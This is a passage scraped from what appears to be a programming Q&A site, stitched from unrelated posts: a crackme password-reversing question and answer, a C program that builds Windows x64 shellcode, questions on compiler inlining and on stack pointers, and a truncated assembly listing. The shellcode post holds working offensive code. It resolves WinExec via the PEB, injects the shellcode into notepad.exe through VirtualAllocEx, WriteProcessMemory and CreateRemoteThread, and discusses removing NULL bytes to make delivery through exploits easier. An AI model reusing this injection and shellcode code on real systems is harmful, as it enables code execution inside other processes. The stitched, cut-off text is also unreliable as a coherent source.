So I am working on a "find the password" type binary disassembly problem and cannot quite figure it out.
The assembly is as follows:
function checkpw
**************************************************************
* *
* FUNCTION *
**************************************************************
undefined8 __stdcall checkpw(void)
undefined8 RAX:8 <RETURN>
checkpw XREF[2]: Entry Point(*), main:001012a1(c)
00101179 48 89 c8 MOV RAX,RCX
0010117c 48 31 c1 XOR RCX,RAX
0010117f 8a 08 MOV CL,byte ptr [RAX]
00101181 80 f1 52 XOR CL,0x52
00101184 80 f9 11 CMP CL,0x11
00101187 75 5e JNZ LAB_001011e7
00101189 8a 48 07 MOV CL,byte ptr [RAX + 0x7]
0010118c 80 e9 16 SUB CL,0x16
0010118f 80 f9 0d CMP CL,0xd
00101192 75 53 JNZ LAB_001011e7
00101194 8a 48 01 MOV CL,byte ptr [RAX + 0x1]
00101197 48 31 d2 XOR RDX,RDX
0010119a fe c2 INC DL
0010119c 48 d1 e2 SHL RDX,1
0010119f 40 8a 3c 10 MOV DIL,byte ptr [RAX + RDX*0x1]
001011a3 40 30 cf XOR DIL,CL
001011a6 40 80 ff 40 CMP DIL,0x40
001011aa 75 3b JNZ LAB_001011e7
001011ac 80 c1 63 ADD CL,0x63
001011af 80 f9 d6 CMP CL,0xd6
001011b2 75 33 JNZ LAB_001011e7
001011b4 8a 4c 10 01 MOV CL,byte ptr [RAX + RDX*0x1 + 0x1]
001011b8 80 f9 23 CMP CL,0x23
001011bb 7e 2a JLE LAB_001011e7
001011bd 80 c1 5b ADD CL,0x5b
001011c0 70 25 JO LAB_001011e7
001011c2 48 8d 0c 50 LEA RCX,[RAX + RDX*0x2]
001011c6 8a 09 MOV CL,byte ptr [RCX]
001011c8 80 f1 f3 XOR CL,0xf3
001011cb 80 f9 c7 CMP CL,0xc7
001011ce 75 17 JNZ LAB_001011e7
001011d0 8a 48 05 MOV CL,byte ptr [RAX + 0x5]
001011d3 8a 68 06 MOV CH,byte ptr [RAX + 0x6]
001011d6 66 81 f1 XOR CX,0x4c47
47 4c
001011db 66 81 f9 CMP CX,0x1234
34 12
001011e0 75 05 JNZ LAB_001011e7
001011e2 48 31 c0 XOR RAX,RAX
001011e5 eb 05 JMP LAB_001011ec
LAB_001011e7 XREF[8]: 00101187(j), 00101192(j),
001011aa(j), 001011b2(j),
001011bb(j), 001011c0(j),
001011ce(j), 001011e0(j)
001011e7 b8 01 00 MOV EAX,0x1
00 00
LAB_001011ec XREF[1]: 001011e5(j)
001011ec c3 RET
According to Ghidra, the decompiled function is:
undefined8 checkpw(void)
{
undefined8 uVar1;
char *in_RCX;
if (((((*in_RCX != 'C') || (in_RCX[7] != '#')) || ((byte)(in_RCX[2] ^ in_RCX[1]) != 0x40)) ||
((in_RCX[1] != 0x73 || (in_RCX[3] < '$')))) ||
((SCARRY1(in_RCX[3],'[') || ((in_RCX[4] != '4' || (*(short *)(in_RCX + 5) != 0x5e73)))))) {
uVar1 = 1;
}
else {
uVar1 = 0;
}
return uVar1;
}
It decompiles main function as :
void main(int param_1,long param_2)
{
long lVar1;
size_t sVar2;
undefined8 uVar3;
lVar1 = ptrace(PTRACE_TRACEME,0,1,0);
if (lVar1 < 0) {
/* WARNING: Subroutine does not return */
exit(1);
}
if (param_1 != 2) {
/* WARNING: Subroutine does not return */
exit(2);
}
sVar2 = strlen(*(char **)(param_2 + 8));
if (sVar2 != 8) {
/* WARNING: Subroutine does not return */
exit(3);
}
uVar3 = checkpw();
if ((int)uVar3 != 0) {
puts("Invalid Password!");
/* WARNING: Subroutine does not return */
exit(4);
}
puts("Correct Password!");
/* WARNING: Subroutine does not return */
exit(0);
}
At this point, I can tell the password must be 8 characters.
Also based on the checkpw decompilation, I believe the following is true (assuming variable passwd is a character array containing a valid password):
passwd[0] = 'C'
passwd[1] = 's'
passwd[2] = '3'
passwd[3] = '$'
passwd[4] = '4'
passwd[7] = '#'
Though I'm not entirely confident on a few of them, I really have am having trouble with those in position 5 and 6.
The decompiled function doesn't seem to reference the seventh character so I'm assuming it can be anything, but not sure what this means as it relates to this problem:
(*(short *)(in_RCX + 5) != 0x5e73)
This:
(*(short *)(in_RCX + 5) != 0x5e73)
Is comparing two characters at once. This statement is calculating in_RCX + 5 and then casting it to short * i.e. a pointer to a 16bit signed integer (the register used in the function body is actually RAX despite the name of this variable in the decompiled code). It is then dereferencing said pointer to get two bytes at once, and it compares them to 0x5e73. Of course, this is just decompiled code, so it doesn't mean that the program is actually doing a 16-bit MOV (indeed it is doing two 8-bit MOVs), it is only the C version of what the decompiler thinks is going on.
You can see this a lot more clearly in the disassembly:
001011d0 8a 48 05 MOV CL,byte ptr [RAX + 0x5]
001011d3 8a 68 06 MOV CH,byte ptr [RAX + 0x6]
001011d6 66 81 f1 XOR CX,0x4c47
47 4c
001011db 66 81 f9 CMP CX,0x1234
34 12
001011e0 75 05 JNZ LAB_001011e7
The check in the disassembly is done with XOR + CMP + JNZ, so Ghidra already xored 0x4c47 and 0x1234 together for you, which is 0x5e73. This means that in order for the check to pass, passwd[5] must be 0x73 ('s') and passwd[6] must be 0x5e ('^').
Related
For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
void shell_code_start()
{
// Get the current process' PEB address
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
void print_shellcode(unsigned char* shellcode, int length)
{
printf("unsigned char shellcode[%d] = \n", length);
int i;
for (i = 0; i < length; i++)
{
if (i % 16 == 0)
{
printf("\"");
}
if (shellcode[i] == 0x00)
{
printf("\x1B[31m\\x%02x\033[0m", shellcode[i]);
}
else
{
printf("\\x%02x", shellcode[i]);
}
if ((i + 1) % 16 == 0)
{
printf("\"\n");
}
}
printf("\";\n");
}
DWORD GetNotepadPID()
{
DWORD dwPID = 0;
DWORD dwSize = 0;
DWORD dwProcesses[1024], cbNeeded;
if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
{
for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
{
if (dwProcesses[i] != 0)
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
if (hProcess)
{
TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
{
_tcslwr(szProcessName);
if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
{
dwPID = dwProcesses[i];
break;
}
}
CloseHandle(hProcess);
}
}
}
}
return dwPID;
}
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
// Get the handle of the notepad.exe process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
// Allocate memory for the shellcode in the notepad.exe process
LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write the shellcode to the allocated memory in the notepad.exe process
WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL);
// Create a remote thread in the notepad.exe process to execute the shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
// Wait for the remote thread to complete
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
}
int main(int argc, char* argv[])
{
unsigned int rel32 = 0;
// E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
// The next four bytes contain the 32-bit offset.
char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
// Calculate the relative offset of the jump instruction
rel32 = *(DWORD*)((char*)shell_code_start + 1);
// Get the actual starting address of the shellcode, by adding the relative offset to the address of the jump instruction
unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
// Get the actual end address of the shellcode by scanning the code looking for the ret instruction...
unsigned char *shell_code_end_real = shell_code_start_real;
while (*shell_code_end_real++ != RET_INSTRUCTION) {};
unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
// Copy the shellcode to the allocated memory and execute it...
LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
DWORD old_protect;
VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
jump_to_shellcode();
// Release the memory allocated for the shellcode
VirtualFree(shellcode_mem, sizeofshellcode, MEM_RELEASE);
// Print the shellcode in hex format
print_shellcode(shell_code_start_real, sizeofshellcode);
// Inject shellcode into the notepad.exe process
InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?
Consider the scenario where you have a complex procedure that have a state machine and is tracked with a state that never changes during a call to kernel, as in code illustrated below.
static inline void kernel(int recursion, int mode){
if(!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch(mode){
default return;
case 1: mode1(recursion-1);
case 2: mode2(recursion-1);
}
}
void mode1(int recursion){
kernel(recursion,1)
}
void mode2(int recursion){
kernel(recursion,2)
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
Came across this while implementing a interpreter for a subset of spirv byte code. The inner branch is for finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switch on instruction OpCodes. Writing separate functions for each state will be even more difficult to maintain, since the kernel already takes up 1000+ loc, and moving up and down for the same traversal point and keeping them the same can be really difficult.
(I know modern c++ have constexpr if, but this is pure c code.)
Edit:
I've tried with msvc compiler with the following code:
uint32_t interp_code[]={1,2,1,1,2};
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
if (!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch (*code) {
default: return;
case 1:
switch (mode) {
default: return;
case 1: mode1(code + 1, recursion - 1);
case 2: mode2(code + 1, recursion - 1);
}
case 2:
switch(mode) {
default: return;
case 1: mode2(code + 1, recursion - 1);
case 2: mode1(code + 1, recursion - 1);
}
}
}
void mode1(const uint32_t* code,int recursion)
{
kernel(code, recursion, 1);
}
void mode2(const uint32_t* code, int recursion)
{
kernel(code, recursion, 2);
}
int main()
{
mode1(interp_code, 5);
return 0;
}
Using inline in the INLINE place yielded a function call (O2 optimizations), and using __forceinline yields the two modes compiled separately with no function call.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271002 EC in al,dx
00007FF670271003 28 85 D2 74 60 48 sub byte ptr [rbp+486074D2h],al
33: kernel(code, recursion, 1);
00007FF670271009 89 5C 24 30 mov dword ptr [rsp+30h],ebx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems with inline the compiler chose to inline the entirety of mode2 function body, and make kernel a separate function call. __forceinline forced the mode1 and mode2 to compile into two function bodies with the kernel. (This code doesn't break on the case, so fall through is expected)
Working with inline directive yields just the same code as nothing specified in INLINE in O2
I've created the following function in c as a demonstration/small riddle about how the stack works in c:
#include "stdio.h"
int* func(int i)
{
int j = 3;
j += i;
return &j;
}
int main()
{
int *tmp = func(4);
printf("%d\n", *tmp);
func(5);
printf("%d\n", *tmp);
}
It's obviously undefined behavior and the compiler also produces a warning about that. However unfortunately the compilation didn't quite work out. For some reason gcc replaces the returned pointer by NULL (see line 6d6).
00000000000006aa <func>:
6aa: 55 push %rbp
6ab: 48 89 e5 mov %rsp,%rbp
6ae: 48 83 ec 20 sub $0x20,%rsp
6b2: 89 7d ec mov %edi,-0x14(%rbp)
6b5: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
6bc: 00 00
6be: 48 89 45 f8 mov %rax,-0x8(%rbp)
6c2: 31 c0 xor %eax,%eax
6c4: c7 45 f4 03 00 00 00 movl $0x3,-0xc(%rbp)
6cb: 8b 55 f4 mov -0xc(%rbp),%edx
6ce: 8b 45 ec mov -0x14(%rbp),%eax
6d1: 01 d0 add %edx,%eax
6d3: 89 45 f4 mov %eax,-0xc(%rbp)
6d6: b8 00 00 00 00 mov $0x0,%eax
6db: 48 8b 4d f8 mov -0x8(%rbp),%rcx
6df: 64 48 33 0c 25 28 00 xor %fs:0x28,%rcx
6e6: 00 00
6e8: 74 05 je 6ef <func+0x45>
6ea: e8 81 fe ff ff callq 570 <__stack_chk_fail#plt>
6ef: c9 leaveq
6f0: c3 retq
This is the disassembly of the binary compiled with gcc version 7.5.0 and the -O0-flag; no other flags were used. This behavior makes the entire code pointless, since it's supposed to show how the stack behaves across function-calls. Is there any way to achieve a more literal compilation of this code with a at least somewhat up-to-date version of gcc?
And just for the sake of curiosity: what's the point of changing the behavior of the code like this in the first place?
Putting the return value in a pointer variable seems to change the behavior of the compiler and it generates the assembly code that returns a pointer to stack:
int* func(int i) {
int j = 3;
j += i;
int *p = &j;
return p;
}
Memory map with execution time:
And this is the assembly code that corresponds to it:
; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27027.1
TITLE c:\LearningTree\348LM\CoursePrograms\348L\Chap1\var.c
.686P
.XMM
include listing.inc
.model flat
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC _x
_DATA SEGMENT
COMM _ret:BYTE
_DATA ENDS
_DATA SEGMENT
_x DD 064H
_DATA ENDS
PUBLIC _main
PUBLIC _test
_BSS SEGMENT
_si DD 01H DUP (?)
?i#?1??main##9#9 DD 01H DUP (?) ; `main'::`2'::i
_BSS ENDS
_DATA SEGMENT
_sj DD 017H
?y#?1??main##9#9 DW 063H ; `main'::`2'::y
_DATA ENDS
; Function compile flags: /Odtp
; File c:\learningtree\348lm\courseprograms\348l\chap1\var.c
_TEXT SEGMENT
_i1$ = -8 ; size = 4
_c2$ = -2 ; size = 1
_c1$ = -1 ; size = 1
